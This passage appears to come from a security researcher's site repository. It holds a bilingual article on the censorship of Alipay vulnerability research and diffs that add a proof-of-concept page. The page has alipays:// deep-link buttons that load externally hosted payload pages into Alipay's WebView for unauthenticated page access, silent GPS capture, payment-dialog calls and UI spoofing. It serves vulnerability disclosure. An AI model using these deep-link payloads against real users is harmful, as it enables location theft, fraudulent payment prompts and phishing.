 - **第22条(Article 22)**: 受害者有权通过司法或行政程序获得**物质和精神损害赔偿** — Victims are entitled to **material and non-material damage** compensation through judicial/administrative procedures
 - **第23条(Article 23)**: 成员国应对实施报复的自然人和法人制定**有效、相称和具有威慑力的处罚** — Member States shall lay down **effective, proportionate and dissuasive penalties** for perpetrators of retaliation
 Alipay的欧洲实体——**Alipay (Europe) Limited S.A.**（CSSF编号W00000009，卢森堡RCS B188095）——持有电子货币机构(EMI)牌照，受CSSF直接监管。
 Alipay's European entity — **Alipay (Europe) Limited S.A.** (CSSF No. W00000009, Luxembourg RCS B188095) — holds an Electronic Money Institution (EMI) license under direct CSSF supervision.
 2025年5月，CSSF已经因反洗钱(AML)违规对其处以**€214,000罚款**——涉及6起可疑交易报告未提交、制裁警报延迟、KYC文件缺失。
 In May 2025, CSSF had already fined it **€214,000** for AML violations — involving 6 unreported suspicious transaction reports, delayed sanction alerts, and missing KYC documentation.
 2026年3月13日，我向CSSF Whistleblowing团队提交了安全漏洞报告。案件编号：**CSSFWB-2026-080**。CSSF的ICT Risk监管部门和Whistleblowing团队**双重确认收到**。
 On March 13, 2026, I submitted the security vulnerability report to CSSF's Whistleblowing team. Case number: **CSSFWB-2026-080**. Both CSSF's ICT Risk Supervision and Whistleblowing teams **confirmed receipt**.
 根据卢森堡2023年5月16日法律（转化EU Directive），**任何善意举报金融行业不当行为的人员均受保护**。保护范围扩展到了整个国内法领域的违规行为，不仅限于EU法范围。
 Under Luxembourg's Law of May 16, 2023 (transposing the EU Directive), **any person reporting in good faith about dysfunctions in the financial sector is protected**. The scope extends to breaches of national law as a whole, not limited to EU law.
 **跨境删除内容是否构成EU法下的"报复"？** 这是一个前沿法律问题。但根据Directive第21条的广义定义——"任何直接或间接导致举报人遭受不利待遇的行为"——通过律师事务所在中国平台删除安全研究文章，**完全可以被论证为报复行为**。
 **Does cross-border content deletion constitute "retaliation" under EU law?** This is a frontier legal question. But under Article 21's broad definition — "any action that causes unjustified detriment" — using a law firm to delete security research articles on Chinese platforms **can be argued as retaliatory conduct**.
 ---
 ## 四、全球回响：38个机构的回答 / Part 4: Global Echo — Responses from 38 Institutions
 如果这些漏洞真的是"正常功能"，为什么全球38个机构做出了回应？
 If these vulnerabilities are truly "normal functionality," why did 38 global institutions respond?
 ### 金融监管机构 / Financial Regulators (16个回复)
 | 机构 Institution | 国家 Country | 行动 Action |
 |------------------|--------------|-------------|
 | **HKMA** 香港金融管理局 | 香港 | 正式投诉立案 CE20260313175412 |
 | **PDPC** 个人数据保护委员会 | 新加坡 | 正式隐私违规调查 #00629724 |
 | **CSSF** 金融监管委员会 | 卢森堡 | Whistleblowing案件 CSSFWB-2026-080 |
 | **FCA** 金融行为监管局 | 英国 | Whistleblowing团队确认收到 |
 | **OAIC** 信息专员办公室 | 澳大利亚 | Intake团队确认收到 |
 | **EDPB** 欧洲数据保护委员会 | 欧盟 | 跨境数据保护投诉确认收到 |
 | **FMA** 金融市场管理局 | 新西兰 | 确认收到，正在评估 |
 | **ANSSI** 网络安全局 | 法国 | 确认收到，已转交相关部门 |
 | **CIRCL** 国家CERT | 卢森堡 | Case #4782984，已代联Alibaba SRC |
 | **DNB** 荷兰央行 | 荷兰 | 确认收到，转info@监管通道 |
 | **BNM** 国家银行 | 马来西亚 | 确认收到 BNM:0001001049160 |
 | **OJK** 金融监管局 | 印尼 | 要求补充说明 Ticket L2603022304 |
 ### 平台方 / Platforms (5个回复)
 | 平台 Platform | 行动 Action |
 |---------------|-------------|
 | **Apple Product Security** | 正式调查 Case OE01052449093014 |
 | **Google Play** | 政策违规审查 #9-7515000040640 |
 | **Packet Storm Security** | **已发布Advisory #217089** |
 | **MITRE CVE** | 6个CVE受理 Ticket #2005801 |
 | **PayPal** | 确认收到 |
 ### 媒体与社区 / Media & Community (7+个回复)
 Help Net Security、Tech in Asia、The Information等媒体确认收到。Reddit r/netsec社区已发帖。独立安全研究者在GitHub上独立复现了发现。
 Help Net Security, Tech in Asia, The Information and others confirmed receipt. Posted on Reddit r/netsec. Independent security researchers reproduced findings on GitHub.
 **总计：189封邮件，22个国家，38+个回复，多个正式调查启动。**
 **Total: 189 emails, 22 countries, 38+ responses, multiple formal investigations launched.**
 ---
 ## 五、全球模式：安全研究者被打压不是个案 / Part 5: Global Pattern — Researcher Suppression Is Not Isolated
 [disclose.io Research Threats Database](https://threats.disclose.io/) 记录了过去25年中**80+起**安全研究者遭受法律威胁的案例。模式惊人地相似：
 The [disclose.io Research Threats Database](https://threats.disclose.io/) documents **80+ cases** of legal threats against security researchers over 25 years. The patterns are strikingly similar:
 | 案例 Case | 年份 Year | 国家 Country | 模式 Pattern |
 |-----------|-----------|--------------|--------------|
 | **Columbus, Ohio vs Connor Goodwolf** | 2024 | 美国 | 研究者报告勒索软件数据泄露 → 被申请禁止令+$25K赔偿 |
 | **NEWAG vs Dragon Sector** | 2023-2024 | 波兰 | 研究者发现火车DRM → 被起诉版权侵权(SLAPP诉讼) |
 | **Modern Solution GmbH** | 2024 | 德国 | 程序员报告漏洞 → 被刑事起诉，罚款€3,000 |
 | **FreeHour vs CS Students** | 2023 | 马耳他 | 4名学生报告漏洞 → 被逮捕、脱衣搜身 |
 | **Arm Ltd vs Maria Markstedter** | 2023 | 英国 | 研究者域名被投诉下线 |
 | **Apple vs Denis Tokarev** | 2021 | 美国 | DMCA武器化删除GitHub漏洞文档 |
 **但本案有一个独特的特征**：这可能是全球第一例——厂商在**第一次投诉被平台驳回后**，更换法律依据（从"名誉侵权"升级到"网络安全法"）成功实施第二次删除的记录案例。
 **But this case has a unique feature**: it may be the first documented global case where a vendor, **after having its first complaint rejected by the platform**, switched legal grounds (from "reputation infringement" to "Cybersecurity Law") to successfully execute a second deletion.
 这不是法律适用。这是**法律购物 (forum shopping)**——在法律武器库中挑选最不可抗辩的条款来绕过平台的公正审核。
 This is not legal application. This is **forum shopping** — selecting the most unassailable statute from the legal arsenal to circumvent the platform's fair review.
 ---
 ## 六、对比的荒谬 / Part 6: The Absurdity of Contrast
 同一份技术研究报告。同样的17个漏洞。同样的308条日志和42张截图。
 The same technical research report. The same 17 vulnerabilities. The same 308 logs and 42 screenshots.
 | 维度 Dimension | 国际社会 International | 中国平台 Chinese Platform |
 |----------------|----------------------|--------------------------|
 | 漏洞定性 Classification | CVSS 9.3, 6个CVE待分配 | "正常功能" |
 | 内容状态 Content Status | 公开存档(Packet Storm/GitHub/innora.ai) | **强制删除** |
 | 法律定性 Legal Status | ISO 29147合规披露 + EU吹哨人保护 | "违反网络安全法" |
 | 厂商回应 Vendor Response | Apple/Google启动调查 | 律师函 + 删帖 |
 | 监管态度 Regulatory Response | 16个机构正式回复/立案 | 沉默 |
 | 研究者待遇 Researcher Treatment | Packet Storm认证 + CVE编号 | **内容审查** |
 **相同的事实，在太平洋的两岸获得了完全相反的法律待遇。**
 **Identical facts receive diametrically opposite legal treatment on two sides of the Pacific.**
 在卢森堡，向CSSF报告金融机构的安全漏洞是受法律保护的吹哨行为(CSSFWB-2026-080)。在中国，发表相同内容是"违反网络安全法"。
 In Luxembourg, reporting a financial institution's security vulnerabilities to CSSF is legally protected whistleblowing (CSSFWB-2026-080). In China, publishing the same content is "violating the Cybersecurity Law."
 卢森堡的Alipay (Europe) Limited S.A. 已经因为合规失败被罚了€214,000。而在中国，揭示其母公司应用安全问题的研究者被审查。
 Luxembourg's Alipay (Europe) Limited S.A. has already been fined €214,000 for compliance failures. In China, the researcher revealing its parent company's application security issues gets censored.
 ---
 ## 七、寒蝉效应与真正的网络安全威胁 / Part 7: Chilling Effect and the Real Cybersecurity Threat
 让我说清楚一件事：**删除安全研究文章不会让漏洞消失。**
 Let me be clear about one thing: **Deleting security research articles does not make vulnerabilities disappear.**
 截至今天，这条CVSS 9.3的攻击链仍然公开存档在三个独立节点：
 As of today, this CVSS 9.3 attack chain remains publicly archived on three independent nodes:
 1. **Packet Storm Security** — Advisory #217089
 2. **GitHub** — sgInnora/alipay-deeplink-research
 3. **innora.ai/zfb/** — 独立镜像
 删除微信文章唯一的效果是：**让中国用户无法了解他们正在使用的应用存在的安全风险。**
 The only effect of deleting WeChat articles: **Chinese users are denied knowledge of the security risks in the application they use daily.**
 这创造了一个荒谬的悖论：全世界的安全研究者、监管机构、甚至厂商的竞争对手(Apple、Google已启动调查)都知道这些漏洞——唯独**受影响最大的10亿中国用户**被蒙在鼓里。
 This creates an absurd paradox: security researchers, regulators, and even the vendor's competitors worldwide (Apple and Google have launched investigations) all know about these vulnerabilities — except for the **1 billion Chinese users most affected**, who are kept in the dark.
 **这才是真正的网络安全威胁。**
 **This is the real cybersecurity threat.**
 不是安全研究者披露漏洞。而是企业利用法律阻止漏洞被修复。
 Not security researchers disclosing vulnerabilities. But corporations using law to prevent vulnerabilities from being fixed.
 ---
 ## 八、想象一下这发生在你身上 / Part 8: Imagine This Happening to You
 你是一个安全研究者。也许在柏林、东京、新加坡、或奥克兰。你在一个10亿用户的应用中发现了一个严重漏洞。
 You're a security researcher. Maybe in Berlin, Tokyo, Singapore, or Auckland. You discover a critical vulnerability in an app used by a billion people.
 **你做了所有正确的事情。**
 **You do everything right.**
 你写了详细的报告。你通过官方渠道私密提交。你等了两周。你打了电话。你再次提交。你等厂商回应。
 You write a detailed report. You submit privately through official channels. You wait two weeks. You make a phone call. You submit again. You wait for the vendor's response.
 厂商告诉你：**"这是正常功能。"**
 The vendor tells you: **"This is normal functionality."**
 你按照ISO 29147国际标准——也就是全世界安全研究者遵循的准则——在穷尽私密渠道后，公开发表技术分析。这也是Packet Storm、MITRE、Google Project Zero处理此类情况的标准流程。
 Following ISO 29147 — the international standard every security researcher in the world follows — you publish your technical analysis after exhausting private channels. This is the same process Packet Storm, MITRE, and Google Project Zero follow.
 然后，**噩梦开始了。**
 Then, **the nightmare begins.**
 12小时内，一家你从未听说过的律师事务所提交投诉，要求删除你的文章。理由："名誉侵权"。平台审核后驳回——你松了一口气。你以为公正的审核流程保护了你。
 Within 12 hours, a law firm you've never heard of files a complaint demanding your article's removal. Reason: "reputation infringement." The platform reviews and rejects it — you breathe a sigh of relief. You think the fair review process has protected you.
 **4天后。**
 **Four days later.**
 同一家律师事务所，同样的投诉对象，**换了四个字**。从"名誉侵权"变成"网络安全法"。
 Same law firm. Same complaint target. **Four words changed.** From "reputation infringement" to "Cybersecurity Law."
 你的文章消失了。全部。4篇。没有通知。没有解释。没有申诉。
 Your articles vanish. All of them. Four articles. No notification. No explanation. No appeal.
 你登录后台，看到的只有一行字：**"违反《中华人民共和国网络安全法》。"** 没有说违反了哪一条。没有说哪些内容违规。没有告诉你该怎么申诉。
 You log into the backend. All you see is a single line: **"Violation of the Cybersecurity Law of the People's Republic of China."** It doesn't say which article. It doesn't say which content was illegal. It doesn't tell you how to appeal.
 你意识到：**4天前保护了你的那道公正审核防线，被四个字击穿了。** 平台甚至没有重新审核。
 You realize: **The fair review process that protected you four days ago was pierced by four words.** The platform didn't even re-review.
 然后你开始想：**下一步会是什么？**
 Then you start wondering: **What comes next?**
 报警？刑事调查？旅行限制？家人被"约谈"？你的名字出现在某个内部数据库里，从此每次入境都被单独"请"到小房间？
 Police report? Criminal investigation? Travel restrictions? Your family getting "invited for tea"? Your name appearing in some internal database, and from now on every time you cross a border you get pulled into a private room?
 你不知道。**因为这个系统不需要告诉你。**
 You don't know. **Because this system doesn't need to tell you.**
 而你的研究——那些被Packet Storm验证、被MITRE受理、被16个国家监管机构正式回复的研究——在全世界都合法存在。唯独在这个审查体系里，它是一个罪名。
 And your research — verified by Packet Storm, accepted by MITRE, formally responded to by 16 countries' regulators — exists lawfully everywhere in the world. Except in this censorship system, where it is a crime.
 **你还敢做安全研究吗？**
 **Would you still dare to do security research?**
 这就是寒蝉效应。不是理论上的。是正在发生的。此刻。对真实的人。
 This is the chilling effect. Not theoretical. Happening right now. To real people.
 ---
 ## 九、我们不会沉默 / Part 9: We Will Not Be Silenced
 他们删除了文章。但他们删不了Packet Storm的存档。删不了MITRE的CVE编号。删不了16个国家监管机构邮箱里的报告。删不了GitHub上的代码。删不了互联网档案馆的快照。
 They deleted the articles. But they cannot delete Packet Storm's archive. Cannot delete MITRE's CVE numbers. Cannot delete the reports in 16 countries' regulators' inboxes. Cannot delete the code on GitHub. Cannot delete the Internet Archive's snapshots.
 **他们唯一成功删除的，是中国10亿用户了解自身安全风险的权利。**
 **The only thing they successfully deleted is the right of 1 billion Chinese users to know about their own security risks.**
 我们将继续配合所有监管机构的调查——HKMA、PDPC、CSSF、FCA、OAIC、Apple、Google。我们将继续在所有中国审查无法触及的平台上发声。
 We will continue cooperating with all regulatory investigations — HKMA, PDPC, CSSF, FCA, OAIC, Apple, Google. We will continue speaking on every platform that Chinese censorship cannot reach.
 ---
 ## 十、致全球安全研究社区——这是一个警告 / Part 10: To the Global Security Research Community — This Is a Warning
 这不仅仅是一个关于支付宝漏洞的故事。
 This is not merely a story about Alipay vulnerabilities.
 **这是一个关于你的故事。**
 **This is a story about you.**
 如果你正在研究任何中国科技巨头的产品——微信、TikTok、大疆、华为、小米——你需要知道：有一个法律武器库随时准备对准你。你不需要做错任何事。你只需要让一家足够大的企业感到不舒服。
 If you are researching any Chinese tech giant's product — WeChat, TikTok, DJI, Huawei, Xiaomi — you need to know: there is a legal arsenal ready to be aimed at you. You don't need to do anything wrong. You only need to make a sufficiently large corporation uncomfortable.
 **规则是这样的：**
 **Here are the rules:**
 1. 企业可以在投诉被驳回后，换一个法律条款重新投诉——直到成功为止
   *Corporations can re-file after rejection, switching legal grounds — until they succeed*
 2. "网络安全法"三个字就是一把万能钥匙——不需要指明条款，不需要解释，不需要给你申诉
   *"Cybersecurity Law" is a master key — no article needs to be specified, no explanation given, no appeal offered*
 3. 你在国际上的所有认可——CVE编号、Packet Storm收录、监管机构回复——在这个审查体系里毫无意义
   *All your international validation — CVE numbers, Packet Storm publication, regulator responses — means nothing in this censorship system*
 4. 你的研究可以同时是"EU法律保护的吹哨行为"和"中国法律下的违法行为"——取决于你站在太平洋的哪一边
   *Your research can simultaneously be "EU-protected whistleblowing" and "illegal under Chinese law" — depending on which side of the Pacific you stand*
 当一家千亿级企业可以在投诉被驳回后，仅仅通过更换法律条款就实现内容删除——**没有任何研究者是安全的。**
 When a hundred-billion-dollar corporation can achieve content deletion simply by switching legal grounds after its complaint is rejected — **no researcher is safe.**
 当"网络安全法"可以被用来删除安全研究而非保护网络安全——**法律本身已经成为一个未修补的零日漏洞。**
 When "Cybersecurity Law" can be used to delete security research rather than protect cybersecurity — **the law itself has become an unpatched zero-day.**
 我们需要全球安全研究社区清醒地认识到：
 The global security research community needs to clearly understand:
 - **全球统一的安全研究者保护框架已经不是"最好有"——而是生存必需品**
   *A globally unified researcher protection framework is no longer "nice to have" — it is a survival necessity*
 - **当法律被武器化时，平台不应成为审查的执行者**
   *When law is weaponized, platforms must not become censorship executors*
 - **跨境报复行为必须被追究**——在EU持有吹哨人保护的实体，不应能在中国平台上实施报复而不承担后果
   *Cross-border retaliation must be accountable* — entities with EU whistleblower protection should not be able to retaliate on Chinese platforms without consequence
 ---
 ## 附录：关键案件编号 / Appendix: Key Case Numbers
 | 编号 ID | 类型 Type | 状态 Status |
 |---------|-----------|-------------|
 | Packet Storm #217089 | Advisory | 已发布 Published |
 | MITRE Ticket #2005801 | 6x CVE申请 | 待分配 Pending |
 | HKMA CE20260313175412 | SVF投诉 | 立案 Filed |
 | PDPC #00629724 | 隐私调查 | 调查中 Investigating |
 | CSSF CSSFWB-2026-080 | Whistleblowing | 已受理 Received |
 | FCA UK | Whistleblowing | 已确认 Confirmed |
 | Apple OE01052449093014 | 产品安全 | 调查中 Investigating |
 | Google Play #9-7515000040640 | 政策违规 | 调查中 Investigating |
 | CIRCL #4782984 | CERT协调 | 进行中 In Progress |
 | WeChat #428526665 | 侵权投诉 | **第一次驳回，第二次删除** |
 ---
 **完整技术报告 / Full Technical Report**: [https://innora.ai/zfb/](https://innora.ai/zfb/)
 **Packet Storm Advisory**: [#217089](https://packetstormsecurity.com/files/217089)
 **GitHub Repo**: [sgInnora/alipay-deeplink-research](https://github.com/sgInnora/alipay-deeplink-research)
 **联系 / Contact**: feng@innora.ai
 ---
 *本文采用CC BY 4.0许可证。任何人均可自由转载、翻译、引用，无需事先许可。*
 *This article is licensed under CC BY 4.0. Anyone may freely republish, translate, or cite without prior permission.*
 *这篇文章会被删除吗？也许。但删除它只会再次证明我们说的一切都是真的。*
 *Will this article be deleted too? Perhaps. But deleting it would only prove, once again, that everything we said is true.*
 ---
 **#SecurityResearch #VulnerabilityDisclosure #Censorship #CybersecurityLaw #WhistleblowerProtection #Alipay #AntGroup #PacketStorm #CVE #MITRE #CSSF #HKMA #FreeSpeech #ResearcherRights #InfoSec**
--- a/index.html
+++ b/index.html
@@ -468,7 +468,56 @@ body.lang-zh .en { display: none; }
 }
 </script>
 </head>
-<body>
+<body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
 <!-- Alert Banner -->
 <div class="alert-banner">
--- a/patchproxy-146k.html
+++ b/patchproxy-146k.html
@@ -6,7 +6,56 @@
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>支付宝146,173个方法可被远程替换——PatchProxy热修复的代码级铁证</title>
 </head>
-<body>
+<body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
 <section style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'PingFang SC', 'Hiragino Sans GB', 'Microsoft YaHei', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 1.75; color: #3f3f3f; text-align: justify; letter-spacing: 0.5px; padding: 0 6px">
 <!-- [0] AI辅助声明 -->
--- a/poc/evidence/clean_retest.png
+++ b/poc/evidence/clean_retest.png
--- a/poc/evidence/clean_test.png
+++ b/poc/evidence/clean_test.png
--- a/poc/evidence/cve1_retest.png
+++ b/poc/evidence/cve1_retest.png
--- a/poc/evidence/cve3_obf.png
+++ b/poc/evidence/cve3_obf.png
--- a/poc/evidence/cve3_obf_retest.png
+++ b/poc/evidence/cve3_obf_retest.png
--- a/poc/evidence/cve3_proof_20260316_155434.png
+++ b/poc/evidence/cve3_proof_20260316_155434.png
--- a/poc/evidence/cve3_tradepay_triggered.png
+++ b/poc/evidence/cve3_tradepay_triggered.png
--- a/poc/evidence/cve4_obf.png
+++ b/poc/evidence/cve4_obf.png
--- a/poc/evidence/cve4_obf_retry.png
+++ b/poc/evidence/cve4_obf_retry.png
--- a/poc/evidence/cve4_v2.png
+++ b/poc/evidence/cve4_v2.png
--- a/poc/ios_test.html
+++ b/poc/ios_test.html
@@ -0,0 +1,156 @@
 <!DOCTYPE html>
 <html lang="zh"><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>Alipay CVE PoC — iOS Verification</title>
 <style>
 *{box-sizing:border-box;margin:0;padding:0}
 body{font-family:-apple-system,system-ui,sans-serif;background:#f0f2f5;color:#333;-webkit-text-size-adjust:100%}
 .c{max-width:500px;margin:0 auto;padding:12px}
 .hd{background:linear-gradient(135deg,#c41d2b,#8b0000);color:#fff;padding:16px;border-radius:12px;text-align:center;margin-bottom:12px}
 .hd h1{font-size:17px;margin-bottom:4px}
 .hd p{font-size:11px;opacity:.85}
 .card{background:#fff;border-radius:10px;padding:14px;margin-bottom:10px;box-shadow:0 1px 6px rgba(0,0,0,.08)}
 .card h3{font-size:13px;color:#1677ff;margin-bottom:6px}
 .card .desc{font-size:11px;color:#888;margin-bottom:8px;line-height:1.4}
 .btn{display:block;width:100%;padding:13px;border-radius:8px;text-decoration:none;font-size:14px;color:#fff;font-weight:600;text-align:center;margin:6px 0;border:none}
 .r{background:#f5222d}.b{background:#1677ff}.p{background:#722ed1}.g{background:#52c41a}.o{background:#fa8c16}
 .tag{display:inline-block;font-size:9px;padding:2px 6px;border-radius:3px;color:#fff;margin-left:4px;vertical-align:middle}
 .tag-c{background:#f5222d}.tag-h{background:#fa541c}
 .warn{background:#fff7e6;border:1px solid #ffd591;border-radius:8px;padding:10px;font-size:11px;color:#d46b08;margin:10px 0;line-height:1.5}
 .info{background:#e6f7ff;border:1px solid #91d5ff;border-radius:8px;padding:10px;font-size:11px;color:#096dd9;margin:10px 0;line-height:1.5}
 .steps{counter-reset:s}
 .step{display:flex;gap:8px;padding:6px 0;border-bottom:1px solid #f5f5f5;counter-increment:s}
 .step:last-child{border:none}
 .step::before{content:counter(s);background:#f5222d;color:#fff;min-width:20px;height:20px;border-radius:50%;display:flex;align-items:center;justify-content:center;font-size:11px;font-weight:bold}
 .step p{font-size:11px;color:#555;line-height:1.5}
 .step b{color:#333}
 .divider{height:1px;background:#f0f0f0;margin:10px 0}
 .ft{text-align:center;color:#bbb;font-size:9px;padding:16px;line-height:1.6}
 .cve-id{font-family:monospace;font-size:10px;color:#999;display:block;margin-top:2px}
 </style>
 </head><body>
 <div class="c">
 <div class="hd">
  <h1>Alipay DeepLink/JSBridge CVE PoC</h1>
  <p>iOS Safari Verification | MITRE Ticket #2005801</p>
  <p style="margin-top:4px;font-size:10px">Innora AI Security Research | 2026-03-16</p>
 </div>
 <div class="card">
  <h3>iOS Safari 录屏验证步骤</h3>
  <div class="steps">
    <div class="step"><p><b>开始iOS录屏</b>（控制中心 → 录屏按钮）</p></div>
    <div class="step"><p><b>确认已安装支付宝</b>（任意版本均可）</p></div>
    <div class="step"><p><b>逐个点击下方按钮</b>，每个按钮对应一个CVE</p></div>
    <div class="step"><p>支付宝自动打开 → <b>观察WebView中的结果</b></p></div>
    <div class="step"><p>若出现拦截页面，<b>点击"继续访问"</b></p></div>
    <div class="step"><p>返回Safari → 测试下一个CVE</p></div>
  </div>
 </div>
 <div class="warn">
  <b>重要说明：</b>此PoC仅在已安装支付宝的设备上生效。点击按钮后支付宝会自动打开。
  所有测试均为安全研究目的，不会修改任何数据。tradePay测试使用无效订单号，不会产生真实扣款。
 </div>
 <!-- CVE-1: DeepLink URL Scheme Bypass -->
 <div class="card">
  <h3>CVE-1: DeepLink URL Scheme 绕过 <span class="tag tag-c">CVSS 9.1</span></h3>
  <span class="cve-id">CWE-939 | MITRE Ticket #2005801</span>
  <p class="desc">外部浏览器通过 alipays:// 直接打开支付宝内部页面，无需任何认证。证明 SchemeServiceImpl.process(Uri) 不验证来源。</p>
  <a class="btn r" href="alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/payload_cve1.html">
    Test 1A: 加载外部URL到WebView
  </a>
  <a class="btn o" href="alipays://platformapi/startapp?appId=20000153">
    Test 1B: 直接打开联系人页面
  </a>
  <a class="btn o" href="alipays://platformapi/startapp?appId=20000003">
    Test 1C: 直接打开账单页面
  </a>
  <a class="btn o" href="alipays://platformapi/startapp?appId=20000186">
    Test 1D: 直接打开扫码器
  </a>
 </div>
 <!-- CVE-2: GPS Silent Exfiltration -->
 <div class="card">
  <h3>CVE-2: GPS静默外泄 <span class="tag tag-c">CVSS 7.4</span></h3>
  <span class="cve-id">CWE-359 | iOS关键测试</span>
  <p class="desc">通过DeepLink加载的外部页面调用 getLocation JSAPI，静默获取GPS坐标。iOS如果之前授权过支付宝定位，无需再次弹窗。</p>
  <a class="btn r" href="alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/payload_cve2.html">
    Test 2: GPS定位外泄测试
  </a>
 </div>
 <!-- CVE-3: tradePay Unauthorized Payment -->
 <div class="card">
  <h3>CVE-3: tradePay未授权支付调用 <span class="tag tag-h">CVSS 8.6</span></h3>
  <span class="cve-id">CWE-940 | 支付安全</span>
  <p class="desc">外部加载的页面调用 tradePay JSAPI 可触发真实支付对话框。使用无效订单号，不会产生真实扣款。</p>
  <a class="btn r" href="alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/payload_cve3.html">
    Test 3: tradePay支付调用测试
  </a>
 </div>
 <!-- CVE-4: UI Spoofing -->
 <div class="card">
  <h3>CVE-4: UI欺骗 (setTitle/showToast) <span class="tag tag-h">CVSS 8.1</span></h3>
  <span class="cve-id">CWE-451 | UI安全</span>
  <p class="desc">攻击者页面可修改支付宝原生标题栏和弹出系统级Toast，实现钓鱼攻击。用户会以为是支付宝官方提示。</p>
